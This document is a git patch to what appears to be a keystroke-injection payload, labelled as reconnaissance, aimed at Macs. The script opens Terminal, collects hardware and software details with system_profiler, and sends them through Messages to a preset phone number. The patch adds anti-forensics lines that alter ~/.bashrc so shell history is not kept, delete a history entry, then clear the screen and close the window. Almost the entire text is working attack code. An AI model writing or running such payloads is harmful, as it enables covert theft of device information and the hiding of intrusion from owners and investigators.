From 00dd125fa96466a2ffb548a976ed4d8984f1312b Mon Sep 17 00:00:00 2001 From: Narsty Date: Thu, 22 Jun 2023 22:25:52 -0500 Subject: [PATCH] Update Info Infiltrator to Iphone.txt --- RECON/Info Infiltrator to Iphone.txt | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/RECON/Info Infiltrator to Iphone.txt b/RECON/Info Infiltrator to Iphone.txt index c2a331b..7faa493 100644 --- a/RECON/Info Infiltrator to Iphone.txt +++ b/RECON/Info Infiltrator to Iphone.txt @@ -19,16 +19,19 @@ STRING terminal DELAY 1000 ENTER DELAY 500 -STRING x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +STRING x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' DELAY 500 ENTER DELAY 500 ENTER DELAY 2000 -GUI h - - - - - - +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI W